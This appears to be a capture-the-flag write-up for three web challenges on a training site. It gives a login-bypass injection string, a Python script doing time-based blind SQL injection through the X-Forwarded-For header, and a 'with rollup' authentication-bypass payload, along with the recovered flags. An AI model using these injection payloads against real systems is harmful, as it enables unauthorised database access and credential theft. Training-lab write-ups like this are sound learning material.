1/登陆一下好吗??
http://ctf5.shiyanbar.com/web/wonderkun/web/index.html
='
='
ctf{51d1bf8fb65a8c2406513ee8f52283e7}
2/who are you?
http://ctf5.shiyanbar.com/web/wonderkun/index.php
import requests
import time
# Candidate alphabet the oracle is asked about, one character per request:
# lowercase letters and digits (the hex body of the flag) plus the few
# punctuation characters the flag format uses. `flag` collects the recovered
# characters in order.
payloads = (
    'abcdefghijklmnopqrstuvwxyz'
    '0123456789'
    '@_.{}-'
)
flag = ''
def exp(x, i):
    """Time-based blind oracle for one (position, candidate) pair.

    Issues a single GET whose X-FORWARDED-FOR header carries the probe; the
    server-side query sleeps for one second only when the character at
    1-based position `x` of the stored flag equals `i`. The round trip is
    timed with wall-clock time.time(), so network latency is included in
    the measurement -- a slow link can therefore look like a match.

    Returns:
        1 when the request took longer than one second (candidate accepted),
        0 otherwise.

    Defender note: the injection point here is a proxy header, not a form
    field. Header values reach the query exactly like user-typed input and
    need the same parameterisation; a `sleep(` token inside a forwarded-for
    header is also an easy signature for request logging / WAF rules.
    """
    started = time.time()
    target = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
    probe = (
        "' or sleep(ascii(mid((select(flag)from(flag))from(%s)for(1)))"
        "=ascii('%s')) and '1'='1"
    ) % (x, i)
    headers = {
        "Host": "ctf5.shiyanbar.com",
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
        "Accept-Encoding": "gzip, deflate",
        "Connection": "keep-alive",
        "X-FORWARDED-FOR": probe,
    }
    # The response body is irrelevant; only the elapsed time carries the bit.
    requests.get(target, headers=headers)
    elapsed = time.time() - started
    return 1 if elapsed > 1 else 0
# Recover the flag one position at a time: for each of the 32 positions try
# every candidate until the oracle answers 1, print the partial result, and
# move to the next position. A position with no accepted candidate is simply
# skipped, so the printed flag may be shorter than 32 characters.
for x in range(1, 33):
    for i in payloads:
        if exp(x, i):
            flag += i
            print(flag)
            break
print('flag:' + flag)
ctf{cdbf14c9551d5be5612f7bb5d2867853}
3/因缺思汀的绕过
http://ctf5.shiyanbar.com/web/pcat/index.php
uname=d%27or 1=1 group by pwd with rollup limit 1 offset 2